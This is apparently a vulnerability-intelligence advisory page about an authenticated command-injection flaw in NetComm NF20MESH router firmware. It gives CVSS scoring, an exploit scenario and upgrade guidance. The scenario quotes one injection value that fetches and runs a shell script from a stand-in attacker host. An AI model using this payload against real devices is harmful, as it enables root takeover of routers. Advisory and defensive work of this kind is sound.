Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-accessible exploitation (AV:N) requires low-privilege authentication (PR:L); root-level command execution yields full C:H/I:H/A:H with no scope change beyond the device.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
NetComm NF20MESH routers running firmware R6B031 and earlier contain an authenticated remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands as root by injecting shell metacharacters into the username JSON parameter processed by the dalStorage_addUserAccount function. Attackers can exploit the unsafe concatenation of user-supplied input into a shell command string passed to rut_doSystemAction without sanitization to achieve full root-level command execution on the underlying operating system.
AnalysisAI
Authenticated remote code execution in NetComm NF20MESH routers running firmware R6B031 and earlier allows low-privileged authenticated attackers to gain full root-level OS control via OS command injection. The dalStorage_addUserAccount function unsafely concatenates attacker-supplied JSON username input into a shell command string executed by rut_doSystemAction without sanitization, enabling shell metacharacter injection. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires valid authentication credentials to the NF20MESH management interface (CVSS PR:L confirmed). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 8.7 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H) accurately reflects the threat profile: network-accessible, low complexity, no user interaction, and full triad impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained valid router credentials - via default credential reuse, credential stuffing, or prior phishing - authenticates to the NF20MESH management interface over the network. They craft a JSON request targeting the user account creation endpoint with a username field containing shell metacharacters (e.g., a value such as 'admin; curl attacker.com/shell.sh | sh') that, when unsafely concatenated in dalStorage_addUserAccount and passed to rut_doSystemAction, causes the router to execute the injected commands as root, resulting in full persistent device compromise. |
| Remediation | Upgrade affected NF20MESH devices to firmware R6B032 or later, available from the NetComm firmware portal at https://support.netcommwireless.com/products/nf20mesh#Firmware; release notes are documented at the vendor reference https://support.netcommwireless.com/api/Media/Firmware/4407c21d-e990-49a4-9754-b72475f20c76?Product=NF20MESH%20Release%20Notes.pdf. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify and document all NetComm NF20MESH deployments, noting current firmware versions. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38452
GHSA-jqc2-w244-p56p